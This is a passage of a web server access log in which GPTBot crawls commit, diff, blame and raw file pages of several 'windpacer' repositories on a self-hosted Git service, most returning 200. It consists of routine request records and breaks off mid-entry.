"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/Project%20Planning-1.md" +[17/Feb/2026:13:17:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 9943] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/Project%20Planning-1.md" +[17/Feb/2026:13:17:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2" [Client 74.7.227.38] [Length 11775] [Gzip 5.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2" +[17/Feb/2026:13:17:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Services.tsx" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Services.tsx" +[17/Feb/2026:13:17:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Services.tsx" [Client 74.7.227.38] [Length 14610] [Gzip 6.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Services.tsx" +[17/Feb/2026:13:17:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Services.tsx" [Client 74.7.227.38] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Services.tsx" +[17/Feb/2026:13:17:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83.diff" [Client 74.7.227.38] [Length 24949] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83" +[17/Feb/2026:13:17:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584.patch" [Client 74.7.227.38] [Length 798802] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584" +[17/Feb/2026:13:17:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/83e7d939e386dd9b236553115441a2075fc8fe7f.diff" [Client 74.7.227.38] [Length 141056] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/83e7d939e386dd9b236553115441a2075fc8fe7f" +[17/Feb/2026:13:17:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/README.md" [Client 74.7.227.38] [Length 9859] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/README.md" +[17/Feb/2026:13:17:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/README.md" [Client 74.7.227.38] [Length 9859] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/README.md" +[17/Feb/2026:13:17:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/README.md" [Client 74.7.227.38] [Length 9867] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/README.md" +[17/Feb/2026:13:17:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/packages" [Client 74.7.227.38] [Length 7404] [Gzip 2.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/stars" +[17/Feb/2026:13:17:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/activity" [Client 74.7.227.38] [Length 8382] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/forks" +[17/Feb/2026:13:17:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/projects" [Client 74.7.227.38] [Length 7765] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/forks" +[17/Feb/2026:13:17:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/ChatBot.tsx" +[17/Feb/2026:13:17:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14198] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components" +[17/Feb/2026:13:17:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/About.tsx" [Client 74.7.227.38] [Length 13782] [Gzip 5.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/About.tsx" +[17/Feb/2026:13:17:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/About.tsx" [Client 74.7.227.38] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/About.tsx" +[17/Feb/2026:13:17:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Header.tsx" [Client 74.7.227.38] [Length 14814] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components" +[17/Feb/2026:13:17:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16472] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components" +[17/Feb/2026:13:17:44 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/-" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e.diff" +[17/Feb/2026:13:17:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8" [Client 74.7.227.38] [Length 14807] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584" +[17/Feb/2026:13:17:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=html%2fassets%2fimages" [Client 74.7.227.38] [Length 20593] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images" +[17/Feb/2026:13:17:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/activity/code-frequency" [Client 74.7.227.38] [Length 7539] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/activity" +[17/Feb/2026:13:17:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/activity/contributors" [Client 74.7.227.38] [Length 7617] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/activity" +[17/Feb/2026:13:17:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/About.tsx" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/About.tsx" +[17/Feb/2026:13:17:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Footer.tsx" [Client 74.7.227.38] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Footer.tsx" +[17/Feb/2026:13:17:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14296] [Gzip 7.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Footer.tsx" +[17/Feb/2026:13:17:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Footer.tsx" [Client 74.7.227.38] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Footer.tsx" +[17/Feb/2026:13:17:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Header.tsx" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Header.tsx" +[17/Feb/2026:13:17:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Contact.tsx" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Contact.tsx" +[17/Feb/2026:13:17:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16913] [Gzip 8.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Contact.tsx" +[17/Feb/2026:13:17:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/.gitignore" [Client 74.7.227.38] [Length 12025] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8" +[17/Feb/2026:13:17:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Header.tsx" [Client 74.7.227.38] [Length 14960] [Gzip 7.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Header.tsx" +[17/Feb/2026:13:17:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8" [Client 74.7.227.38] [Length 11640] [Gzip 4.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8" +[17/Feb/2026:13:17:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Header.tsx" [Client 74.7.227.38] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Header.tsx" +[17/Feb/2026:13:17:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Contact.tsx" [Client 74.7.227.38] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Contact.tsx" +[17/Feb/2026:13:17:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/find/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8" [Client 74.7.227.38] [Length 7491] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8" +[17/Feb/2026:13:17:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/nginx.conf" [Client 74.7.227.38] [Length 10150] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/nginx.conf" +[17/Feb/2026:13:17:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=.gitignore" [Client 74.7.227.38] [Length 21493] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.gitignore" +[17/Feb/2026:13:17:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=nginx.conf" [Client 74.7.227.38] [Length 22357] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/nginx.conf" +[17/Feb/2026:13:17:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/packages" [Client 74.7.227.38] [Length 7408] [Gzip 2.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/forks" +[17/Feb/2026:13:17:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/watchers" [Client 74.7.227.38] [Length 7738] [Gzip 2.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/forks" +[17/Feb/2026:13:17:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/.gitignore" [Client 74.7.227.38] [Length 500] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/.gitignore" +[17/Feb/2026:13:17:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/.gitignore" [Client 74.7.227.38] [Length 11836] [Gzip 5.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/.gitignore" +[17/Feb/2026:13:17:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/.gitignore" [Client 74.7.227.38] [Length 10139] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/.gitignore" +[17/Feb/2026:13:17:58 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/%7Bitem.href%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Header.tsx" +[17/Feb/2026:13:17:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13870] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components" +[17/Feb/2026:13:18:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 26368] [Gzip 5.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2" +[17/Feb/2026:13:18:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 15229] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8" +[17/Feb/2026:13:18:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 26354] [Gzip 5.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2" +[17/Feb/2026:13:18:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 26354] [Gzip 5.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2" +[17/Feb/2026:13:18:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 15231] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8" +[17/Feb/2026:13:18:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 15224] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8" +[17/Feb/2026:13:18:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13871] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components" +[17/Feb/2026:13:18:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f" [Client 74.7.227.38] [Length 10421] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets" +[17/Feb/2026:13:18:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d.diff" [Client 74.7.227.38] [Length 2401552] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d" +[17/Feb/2026:13:18:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr 